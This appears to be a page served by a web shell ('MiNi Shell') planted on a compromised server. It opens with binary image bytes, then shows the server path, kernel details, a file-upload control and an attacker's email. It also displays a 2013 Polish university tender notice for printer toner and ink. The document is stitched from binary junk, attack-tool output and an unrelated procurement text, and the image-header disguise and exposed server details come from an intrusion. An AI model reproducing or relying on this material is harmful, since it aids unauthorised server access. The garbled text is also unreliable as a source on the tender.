JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130410/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130410/139880-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa fabrycznie nowych (nie regenerowanych) tonerów i tuszy do drukarek  dla Wydziału Inżynierii Lądowej Politechniki Warszawskiej 
PN/04/04/2013</b><br>
<b>Numer ogłoszenia: 139880 - 2013; data zamieszczenia: 10.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wydział Inżynierii Lądowej Politechniki Warszawskiej , Al. Armii Ludowej 16, 00-637 Warszawa, woj. mazowieckie, tel. 022 234 50 95, 234 65 62, faks 022 234 50 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.il.pw.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowych (nie regenerowanych) tonerów i tuszy do drukarek  dla Wydziału Inżynierii Lądowej Politechniki Warszawskiej 
PN/04/04/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa fabrycznie nowych (nie regenerowanych) tonerów i tuszy do drukarek:
A) Wykonawca zobowiązany jest dostarczyć Zamawiającemu:
-artykuły nowe,
-fabrycznie opakowane,
- nieuszkodzone
- zgodne z przyjętymi powszechnie standardami jakościowymi
- wyprodukowane nie wcześniej niż 6 miesięcy przed terminem dostawy
Dodatkowo materiały eksploatacyjne muszą być fabrycznie opakowane w sposób chroniący kasetę z tonerem po  wyjęciu  z opakowania zewnętrznego (opakowania wewnętrzne). Każda  kaseta oraz opakowanie  z  tonerem  muszą  ponadto  posiadać zabezpieczenie umożliwiające rozpoznanie  czy  materiał eksploatacyjny  był  otwierany/używany. 
B) Wszystkie dostarczone materiały eksploatacyjne muszą  być oznakowane kodem producenta umożliwiającym jednoznaczną identyfikację producenta oraz typ materiału eksploatacyjnego. Oznaczenia  muszą być umieszczone trwale na opakowaniach zewnętrznych  oraz  bezpośrednio  na  kasecie  z  tonerem.
C)Wszystkie materiały eksploatacyjne, bezpośrednio na opakowaniu, muszą posiadać  listę  urządzeń   kompatybilnych   z  oferowanym  materiałem  eksploatacyjnym.
D)Tonery wraz z kasetą oraz tusze nie mogą pochodzić z procesu regeneracji i być wtórnie użyte 
w   dostarczonym  materiale  eksploatacyjnym.
E)Zaoferowane materiały eksploatacyjne muszą posiadać oznaczenie CE na potwierdzenie kompatybilności elektromagnetycznej, zgodnie z dyrektywą 2004108EC.
F)Wykonawca  musi  zagwarantować  jakość  wydruku  polegającą  na  równomiernym  zaczernieniu/barwieniu  drukowanego  tekstu  czy  grafiki,  jednakowe  nasycenie  barw  na  całym  wydruku,  brak  szarych/kolorowych  smug  na  nośniku  w  miejscach  nie  przeznaczonych  do  zadrukowania (100 %  bieli  w  miejscach  niezadrukowanych).
G)Wykonawca jest odpowiedzialny za wady fizyczne i prawne dostarczonych materiałów eksploatacyjnych w zakresie przewidzianym w przepisach kodeksu cywilnego.
H)Wykonawca zobowiązuje się dostarczyć materiały eksploatacyjne, których minimalny termin gwarancji (ważności materiałów) wynosi 12 miesięcy od dnia dostawy.
I) Zamawiający dopuszcza składanie ofert równoważnych. Przez produkt równoważny Zamawiający rozumie produkt fabrycznie nowy (w 100%), produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych lub lepszych (pod względem pojemności tuszu/tonera, wydajności, jakości wydruku, szybkości schnięcia (utrwalania)), nie zamazywanie się druku - winna odpowiadać wyrobowi producenta urządzenia, a od opisu przedmiotu zamówienia określonego przez Zamawiającego różnić się znakiem firmowym, towarowym patentem lub pochodzeniem. Wskazana przez Wykonawcę wydajność kaset z tonerem winna odpowiadać normie ISOIEC 19752 dla drukarek laserowych monochromatycznych oraz normie ISOIEC 19798 dla kaset z tonerem do kolorowych
drukarek laserowych. Wydajność nabojów do drukarek atramentowych winna odpowiadać normie ISOIEC 24711 . Produkt równoważny nie może być produktem regenerowanym i nie może być poddany procesowi ponownego napełniania. Wszystkie elementy wchodzące w skład materiałów eksploatacyjnych muszą być fabrycznie nowe, nieregenerowane, nierefabrykowane, nie wchodzące wcześniej (pierwotnie) w całości, jak również w części, w skład innych materiałów.  Stosowanie materiałów eksploatacyjnych nie może powodować uszkodzeń, awarii eksploatowanego sprzętu oraz wysypywania się tonera z kasety do wnętrza drukarki.                   
J) W przypadku wątpliwości Zamawiającego co do równoważności oferowanych materiałów eksploatacyjnych do drukarek, kserokopiarek, faksów, urządzeń wielofunkcyjnych ciężar udowodnienia równoważności spoczywa na Wykonawcy.
K) Jeśli  Wykonawca  zaoferuje  materiały  eksploatacyjne  równoważne - Zamawiający żąda,  aby  Wykonawca  dołączył  do  oferty  następujące  oświadczenia  i  dokumenty :
-Certyfikat ISO 14001, pozwalający zweryfikować czy producent przestrzega  przepisów związanych z  ochroną  środowiska  oraz  potwierdzający,  że  oferowane  dostawy  odpowiadają wymogom określonym przez Zamawiającego lub certyfikat równoważny na  proces  produkcji  materiałów  eksploatacyjnych, tj. zaświadczenie  niezależnego  podmiotu zajmującego się poświadczaniem  zgodności  działań  Wykonawcy  z  europejskimi  normami  zarządzania  środowiskiem ;
-Certyfikat/zaświadczenie  podmiotu  uprawnionego do kontroli jakości  potwierdzający,  że proces produkcji materiałów eksploatacyjnych przebiega zgodnie z normami   ISO 9001 : 2008  lub  normami  równoważnymi, tj.  zaświadczenie  niezależnego podmiotu  zajmującego się poświadczaniem zgodności  działań Wykonawcy  z  normami  jakościowymi.
-Oświadczenie Wykonawcy potwierdzające, że równoważne kasety z tonerem nie  powodują ograniczeń funkcji i możliwości sprzętu oraz jakości wydruku opisanych w warunkach  technicznych producenta (pełna kompatybilność z oprogramowaniem drukarki, informowanie o liczbie  wydrukowanych  stron  oraz  poziomie  zużycia  tonera).
L)  Zamiast  zaświadczeń,  o  którym  mowa  w  pkt  K.,  Wykonawca  może  złożyć  również  opis  urządzeń  technicznych, instrukcji  obsługi  oraz  środków stosowanych  przez  Wykonawcę dostaw oraz opisu zaplecza naukowo - badawczego Wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia.
Ł)  Wykonawca  może,  zamiast  zaświadczeń,  o  których  mowa  odpowiednio w pkt.   K. lub  Ł.,   złożyć  inne  dokumenty, np.  zaświadczenie  podmiotu  uprawnionego  do  kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym  normom  lub  specyfikacjom  technicznym.             
M) Materiały eksploatacyjne muszą być fabrycznie nowe, bez śladów używania i uszkodzenia, pełnowartościowe, nieregenerowane, nierefabrykowane. Muszą posiadać znak firmowy producenta, etykiety zawierające numer katalogowy, pozwalające na zidentyfikowanie danego produktu i termin jego ważności. Za produkt fabrycznie nowy Zamawiający rozumie przedmiot zamówienia, którego wszystkie elementy potrzebne do jego wyprodukowanie nie były wcześniej używane.
N) Zamawiający wymaga, aby dostarczane materiały wyprodukowane były nie wcześniej niż 6 miesięcy przed terminem ich dostawy do Zamawiającego. Zamawiający nie dopuszcza możliwości zaoferowania materiałów eksploatacyjnych napełnianych powtórnie (regenerowanych) lub skopiowanych w sposób naruszający polskie prawo.
O) Jeżeli w trakcie trwania umowy Zamawiający stwierdzi, że wydajność, jakość lub niezawodność dostarczonych materiałów eksploatacyjnych znacząco odbiega od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony), Wykonawca na żądanie Zamawiającego będzie zobligowany do wymiany na materiał wolny od stwierdzonych wad, spełniający wymagania Zamawiającego (np. pochodzący od producenta, do którego materiał jest przeznaczony), bez zmiany ceny, w terminie 48 godzin (w dni robocze) od momentu zgłoszenia przez Zamawiającego o wadliwym produkcie (mailem lub faksem). Wymiana nastąpi w siedzibie Zamawiającego na koszt i ryzyko Wykonawcy w razie stwierdzenia wad produktu.
P) Wykonawca gwarantuje, że dostarczone tonery i wkłady drukujące będą wysokiej jakości oraz zapewnią kompatybilność pracy z urządzeniami Zamawiającego, zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie.
R) Wykonawca gwarantuje, że dostarczone prze niego tonery i wkłady drukujące nie spowodują utraty praw gwarancji producenta urządzenia, do którego są przeznaczone.
S) Wykonawca zobowiązuje się do pokrycia kosztów naprawy drukarki, gdy jej uszkodzenie powstało w wyniku stosowania tonera lub tuszu dostarczonego przez Wykonawcę. Za podstawę żądania przez Zamawiającego naprawy drukarki (włączając w to wymianę bębna lub głowicy) uważa się pisemną opinię autoryzowanego serwisu producenta drukarki. Naprawa drukarki zostanie wykonana w autoryzowanym serwisie producenta drukarki w ciągu 3 dni od momentu zgłoszenia (faksem) Wykonawcy przez Zamawiającego o konieczności wykonania naprawy. Jeżeli Wykonawca nie wywiąże się z obowiązku określonego powyżej lub wywiąże się w sposób nienależyty, Zamawiającemu przysługiwać będzie prawo zastępczego usunięcia wad na koszt Wykonawcy. Wykonawca zobowiązuje się pokryć wszelkie koszty naprawy urządzenia nawet jego wymiany na nowe, jeśli uszkodzenie nastąpiło wskutek wadliwie działającego tuszu lub tonera.
(szczegółowy zakres zamówienia znajduje się w Rozdziale IV SIWZ).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.21.13-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia
ten warunek na podstawie złożonego wraz z ofertą oświadczenia (Załącznik nr 1 do Rozdziału II)o spełnianiu
warunków udziału w postępowaniu na zasadzie: Wykonawca spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca  wykaże, że zrealizował w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostawy rodzajowo porównywalne z przedmiotem niniejszego przetargu, tj. wykonanie co najmniej 3 zadań, z których co najmniej jedno zadanie było na kwotę 60 tys. zł brutto, a 2 pozostałe na kwoty co najmniej  40 tys. zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia
ten warunek na podstawie złożonego wraz z ofertą oświadczenia (Załącznik nr 1 do Rozdziału II)o spełnianiu
warunków udziału w postępowaniu na zasadzie: Wykonawca spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia
ten warunek na podstawie złożonego wraz z ofertą oświadczenia (Załącznik nr 1 do Rozdziału II)o spełnianiu
warunków udziału w postępowaniu na zasadzie: Wykonawca spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia
ten warunek na podstawie złożonego wraz z ofertą oświadczenia (Załącznik nr 1 do Rozdziału II)o spełnianiu
warunków udziału w postępowaniu na zasadzie: Wykonawca spełnia albo nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku zaoferowania przez Wykonawcę materiałów równoważnych, budzących wątpliwości Zamawiającego, co do spełniania określonych w SIWZ warunków tj. oryginalności, wydajności, czy też potwierdzenia, że zaoferowane materiały eksploatacyjne nie są regenerowane Zamawiający zastrzega sobie prawo do wezwania Wykonawcy do złożenia wybranych próbek.
2.Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania, których pełnomocnik jest upoważniony. Pełnomocnictwo winno być złożone w oryginale lub kopii potwierdzonej notarialnie.
3.Wykonawcy składający ofertę wspólną są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania także oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. Podpisany przez wszystkich wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. Dokument pełnomocnika należy przedstawić w formie oryginału. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik.
4.Certyfikat ISO 14001, pozwalający zweryfikować czy producent przestrzega  przepisów związanych z  ochroną  środowiska  oraz  potwierdzający,  że  oferowane  dostawy  odpowiadają wymogom określonym przez Zamawiającego lub certyfikat równoważny na  proces  produkcji  materiałów  eksploatacyjnych, tj. zaświadczenie  niezależnego  podmiotu zajmującego się poświadczaniem  zgodności  działań  Wykonawcy  z  europejskimi  normami  zarządzania  środowiskiem ;
5.Certyfikat/zaświadczenie  podmiotu  uprawnionego do kontroli jakości  potwierdzający,  że proces produkcji materiałów eksploatacyjnych przebiega zgodnie z normami   ISO 9001 : 2008  lub  normami  równoważnymi, tj.  zaświadczenie  niezależnego podmiotu  zajmującego się poświadczaniem zgodności  działań Wykonawcy  z  normami  jakościowymi.
6.Oświadczenie Wykonawcy potwierdzające, że równoważne kasety z tonerem nie  powodują ograniczeń funkcji i możliwości sprzętu oraz jakości wydruku opisanych w warunkach  technicznych producenta (pełna kompatybilność z oprogramowaniem drukarki, informowanie o liczbie  wydrukowanych  stron  oraz  poziomie  zużycia  tonera).
7.Zamiast  zaświadczeń,  o  którym  mowa  w  pkt  4-6  Wykonawca  może  złożyć  również  opis  urządzeń  technicznych, instrukcji  obsługi  oraz  środków stosowanych  przez  Wykonawcę dostaw oraz opisu zaplecza naukowo - badawczego Wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia.
8.Wykonawca  może,  zamiast  zaświadczeń,  o  których  mowa  odpowiednio w pkt.   4-6 lub  7   złożyć  inne  dokumenty, np.  zaświadczenie  podmiotu  uprawnionego  do  kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym  normom  lub  specyfikacjom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwości i warunki zmiany umowy 1. Zgodnie z art. 144 ust 1 ustawy prawo zamówień publicznych, Zamawiający
przewiduje możliwość podpisania aneksu do Umowy zaakceptowanego przez obie strony w poniżej wymienionych przypadkach: 1.1 Zamawiający zastrzega sobie prawo do zmian treści zawartej umowy w przypadku, gdy konieczność
ich wprowadzenia wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany
mogą dotyczyć okoliczności wynikających z przyczyn: technicznych, gospodarczych, finansowych, organizacyjnych,
jeżeli będzie to konieczne dla uzyskania celu określonego w postanowieniach umowy zawartej z Wykonawca. 1.2
Niezależnie od okoliczności wymienionych w pkt. 1 Zamawiający ma prawo dokonywać zmian umowy dotyczących w
szczególności: a) zmian parametrów przedmiotu umowy na wyższe (korzystniejsze dla Zamawiającego) przy
zachowaniu ceny określonej w niniejszej umowie, b) zmiany osób odpowiedzialnych za realizację przedmiotu umowy,
c) zmiany siedziby jednej ze stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.il.pw.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Inżynierii Lądowej Politechniki Warszawskiej, Al. Armii Ludowej 16, 00-637 Warszawa, pok. 144.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2013 godzina 11:00, miejsce: Wydział Inżynierii Lądowej Politechniki Warszawskiej, Al. Armii Ludowej 16, 00-637 Warszawa, pok. 144.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com